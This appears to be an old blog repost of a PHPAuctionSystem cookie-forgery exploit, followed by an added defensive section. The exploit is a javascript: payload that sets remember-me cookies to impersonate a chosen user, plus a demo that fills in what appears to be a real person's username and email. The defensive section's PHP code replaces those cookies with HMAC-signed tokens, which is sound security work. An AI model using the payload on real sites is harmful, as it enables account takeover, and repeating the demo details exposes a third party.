"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

Monday, 5 January 2009

PHPAuctionSystem Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/7674



Discovered By: ZoRLu

javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; "PHPAUCTION_RM_EMAIL=[email]; path=/";

Example for the demo (username: sallama):

javascript:document.cookie = "PHPAUCTION_RM_ID=47; path=/"; document.cookie = "PHPAUCTION_RM_NAME=salla; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=sallama; path=/"; "PHPAUCTION_RM_EMAIL=trt-turk%40hotmail.com; path=/";
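A defender-side sketch of the fix, added here and not taken from PHPAuctionSystem or from the original advisory. It assumes the application treats the browser-supplied PHPAUCTION_RM_* cookies as proof of identity, and replaces them with one HMAC-signed token that the server verifies before restoring a session. The cookie name PHPAUCTION_RM, the function names and the key handling are hypothetical.

```php
<?php
// Added example, not PHPAuctionSystem code. Assumption: the "remember me"
// feature trusts the plain PHPAUCTION_RM_* cookie values sent by the browser.
// Hardened form: one token "userId|expiry|HMAC-SHA256" that only the server can mint.

const RM_COOKIE = 'PHPAUCTION_RM'; // hypothetical replacement cookie name

function rm_issue(int $userId, string $key, int $ttl = 1209600, ?int $now = null): string
{
    $payload = $userId . '|' . (($now ?? time()) + $ttl);
    return $payload . '|' . hash_hmac('sha256', $payload, $key);
}

// Returns the authenticated user id, or null when the token is malformed,
// forged, altered or expired.
function rm_verify(string $token, string $key, ?int $now = null): ?int
{
    $parts = explode('|', $token);
    if (count($parts) !== 3) {
        return null;
    }
    [$userId, $expires, $mac] = $parts;
    if (!ctype_digit($userId) || !ctype_digit($expires)) {
        return null;
    }
    $expected = hash_hmac('sha256', $userId . '|' . $expires, $key);
    if (!hash_equals($expected, $mac)) { // constant-time comparison
        return null;
    }
    return ((int) $expires >= ($now ?? time())) ? (int) $userId : null;
}

// Constructed demo values; in production the key comes from server-side config.
$key = random_bytes(32);
$genuine = rm_issue(47, $key);
$clientMade = '47|' . (time() + 3600) . '|' . str_repeat('0', 64);
$altered = '1' . substr($genuine, 2); // user id changed, MAC left as issued

var_dump(rm_verify($genuine, $key));    // accepted: server-issued token
var_dump(rm_verify($clientMade, $key)); // rejected: no valid MAC
var_dump(rm_verify($altered, $key));    // rejected: payload no longer matches MAC

// When sending it (PHP 7.3+ options array):
// setcookie(RM_COOKIE, $genuine, ['expires' => time() + 1209600, 'path' => '/',
//     'secure' => true, 'httponly' => true, 'samesite' => 'Lax']);
```

The signature only proves the server issued the token; keeping a random per-user token in the database as well lets the server revoke it on logout or password change.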

